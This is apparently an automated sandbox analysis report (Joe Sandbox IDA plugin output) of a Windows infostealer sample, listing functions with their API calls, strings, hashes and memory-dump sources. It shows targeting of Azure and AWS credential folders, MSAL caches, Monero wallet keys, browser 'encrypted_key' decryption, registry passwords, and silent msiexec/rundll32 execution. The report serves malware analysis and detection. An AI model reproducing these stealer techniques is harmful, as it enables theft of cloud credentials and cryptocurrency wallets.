                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 724220c4635c056c2c5c681ddb1418e89db0b3ce30de79c0394f2b5ba07a8dcd
                                  • Instruction ID: 5e01f5ccc3f78267c817efced8f4359482d1ddde5f8680a443477a032efa655a
                                  • Opcode Fuzzy Hash: 724220c4635c056c2c5c681ddb1418e89db0b3ce30de79c0394f2b5ba07a8dcd
                                  • Instruction Fuzzy Hash: 90814C71950118ABEB68DF54CC95FEEBBB8FF48704F008698E109A6180DF746B85CFA5
                                  Function 00544D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00544DCD
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 0054492C
                                    • Part of subcall function 00544910: FindFirstFileA.KERNEL32(?,?), ref: 00544943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00544E59
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FDC), ref: 00544971
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FE0), ref: 00544987
                                    • Part of subcall function 00544910: FindNextFileA.KERNEL32(000000FF,?), ref: 00544B7D
                                    • Part of subcall function 00544910: FindClose.KERNEL32(000000FF), ref: 00544B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00544EE5
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 005449B0
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,005508D2), ref: 005449C5
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 005449E2
                                    • Part of subcall function 00544910: PathMatchSpecA.SHLWAPI(?,?), ref: 00544A1E
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,011FE798), ref: 00544A4A
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,00550FF8), ref: 00544A5C
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,?), ref: 00544A70
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,00550FFC), ref: 00544A82
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,?), ref: 00544A96
                                    • Part of subcall function 00544910: CopyFileA.KERNEL32(?,?,00000001), ref: 00544AAC
                                    • Part of subcall function 00544910: DeleteFileA.KERNEL32(?), ref: 00544B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: c040a66612e360f425315a0ac02710a88cc5a9dac9e4f2cf440a50214bd61c1e
                                  • Instruction ID: 7dc2b4b0423d3004bcdc7e06bb67d05f0ea43dcbea243f8b41b09a6b47edcec6
                                  • Opcode Fuzzy Hash: c040a66612e360f425315a0ac02710a88cc5a9dac9e4f2cf440a50214bd61c1e
                                  • Instruction Fuzzy Hash: 7D41827A94021867E750F770EC5BFED3B38BBA4705F004454B54A660C1EEB46BC98B97
                                  Function 00549010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0054906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: 0b4aeca2807f88fc7e7579553e363d00ddc055e5a475a2505235716945617080
                                  • Instruction ID: 6aa1290e5aaf3ffc717308bd76d42e579bcfc670a46a6f4ffb7328d576180d0e
                                  • Opcode Fuzzy Hash: 0b4aeca2807f88fc7e7579553e363d00ddc055e5a475a2505235716945617080
                                  • Instruction Fuzzy Hash: B2711075910209BBDB04DFE4DC89FEEBBB9BF88340F108508F519A7290DB78A945CB65
                                  Function 00542E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 005431C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0054335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 005434EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 4346ef60120941e3e0bf243a68d6b454bd2a322459fb4d5e68053efe1b37d897
                                  • Instruction ID: 7b5e66afcae98463f6ce5083faa4a14b718c178972ed122002380ddd4f4cfd4f
                                  • Opcode Fuzzy Hash: 4346ef60120941e3e0bf243a68d6b454bd2a322459fb4d5e68053efe1b37d897
                                  • Instruction Fuzzy Hash: 61122371840109AAEB59FBA0DC9AFEDBB38FF94308F504159F50666191EF342B4ACF52
                                  Function 005452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 00536280: InternetOpenA.WININET(00550DFE,00000001,00000000,00000000,00000000), ref: 005362E1
                                    • Part of subcall function 00536280: StrCmpCA.SHLWAPI(?,011FE878), ref: 00536303
                                    • Part of subcall function 00536280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00536335
                                    • Part of subcall function 00536280: HttpOpenRequestA.WININET(00000000,GET,?,011FE158,00000000,00000000,00400100,00000000), ref: 00536385
                                    • Part of subcall function 00536280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005363BF
                                    • Part of subcall function 00536280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005363D1
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545318
                                  • lstrlen.KERNEL32(00000000), ref: 0054532F
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00545364
                                  • lstrlen.KERNEL32(00000000), ref: 00545383
                                  • lstrlen.KERNEL32(00000000), ref: 005453AE
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: b3fb0e075f2e3c00a5be0453cd3c3893e89d9220eef9c59ecec075b0b053e9ff
                                  • Instruction ID: 665b1f8c0b8cea655db6aed1f2889876ae2e6a1fd1e6f813fbd8b0159b44bad3
                                  • Opcode Fuzzy Hash: b3fb0e075f2e3c00a5be0453cd3c3893e89d9220eef9c59ecec075b0b053e9ff
                                  • Instruction Fuzzy Hash: F251303095014A9BEB54FF60CD9AAED3F79FF90308F504018F80A5A592EF346B45CBA2
                                  Function 005412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: b533b59b10758e5e9dae5185c50e9971523db6329812ed0725a329becb754b33
                                  • Instruction ID: 1c270ff0b1cb1ae7048d2b8db2d9db5deba64f644e395947fcad2db0e00c51b6
                                  • Opcode Fuzzy Hash: b533b59b10758e5e9dae5185c50e9971523db6329812ed0725a329becb754b33
                                  • Instruction Fuzzy Hash: 49C1B7B594010AABDB14EF60DC8DFEE7778FB94308F004598F50A67241EB74AA85CF95
                                  Function 00544280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 005442EC
                                  • lstrcat.KERNEL32(?,011FE608), ref: 0054430B
                                  • lstrcat.KERNEL32(?,?), ref: 0054431F
                                  • lstrcat.KERNEL32(?,011FD0B0), ref: 00544333
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 00548D90: GetFileAttributesA.KERNEL32(00000000,?,00531B54,?,?,0055564C,?,?,00550E1F), ref: 00548D9F
                                    • Part of subcall function 00539CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00539D39
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 005493C0: GlobalAlloc.KERNEL32(00000000,005443DD,005443DD), ref: 005493D3
                                  • StrStrA.SHLWAPI(?,011FE4B8), ref: 005443F3
                                  • GlobalFree.KERNEL32(?), ref: 00544512
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539AEF
                                    • Part of subcall function 00539AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00534EEE,00000000,?), ref: 00539B01
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539B2A
                                    • Part of subcall function 00539AC0: LocalFree.KERNEL32(?,?,?,?,00534EEE,00000000,?), ref: 00539B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 005444A3
                                  • StrCmpCA.SHLWAPI(?,005508D1), ref: 005444C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 005444D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 005444E5
                                  • lstrcat.KERNEL32(00000000,00550FB8), ref: 005444F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: f61d490d3bbc596ab629aba9b60be4ce3c2988e9f09e62487dece08daf76efab
                                  • Instruction ID: b1375af1d1df7fc886ad6ffed1f7735e04b50baf55df0a524a7dbf942c8def16
                                  • Opcode Fuzzy Hash: f61d490d3bbc596ab629aba9b60be4ce3c2988e9f09e62487dece08daf76efab
                                  • Instruction Fuzzy Hash: 247157B6900209BBDB14EBA0DC89FEE7779BBC8304F048598F51997181EA74DB45CF92
                                  Function 00531310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005312B4
                                    • Part of subcall function 005312A0: RtlAllocateHeap.NTDLL(00000000), ref: 005312BB
                                    • Part of subcall function 005312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005312D7
                                    • Part of subcall function 005312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005312F5
                                    • Part of subcall function 005312A0: RegCloseKey.ADVAPI32(?), ref: 005312FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053134F
                                  • lstrlen.KERNEL32(?), ref: 0053135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00531377
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00531465
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 005314EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 3bcbbb9a731cd2e77a46a8e5fdb2bb1efd05c98c208ccc4bbaadf643a9730ef8
                                  • Instruction ID: c1ce276225b5b549e0c141ae543cc493f6c38c52a960b57b9c6cc08edd8d7773
                                  • Opcode Fuzzy Hash: 3bcbbb9a731cd2e77a46a8e5fdb2bb1efd05c98c208ccc4bbaadf643a9730ef8
                                  • Instruction Fuzzy Hash: 505142B195011A5BDB55EB60DC9ABED773CFF90304F404198B60A62082EE346B89CFA6
                                  Function 005375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005372D0: memset.MSVCRT ref: 00537314
                                    • Part of subcall function 005372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0053733A
                                    • Part of subcall function 005372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005373B1
                                    • Part of subcall function 005372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0053740D
                                    • Part of subcall function 005372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00537452
                                    • Part of subcall function 005372D0: HeapFree.KERNEL32(00000000), ref: 00537459
                                  • lstrcat.KERNEL32(00000000,005517FC), ref: 00537606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00537648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 0053765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0053768F
                                  • lstrcat.KERNEL32(00000000,00551804), ref: 005376A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 005376D3
                                  • lstrcat.KERNEL32(00000000,00551808), ref: 005376ED
                                  • task.LIBCPMTD ref: 005376FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
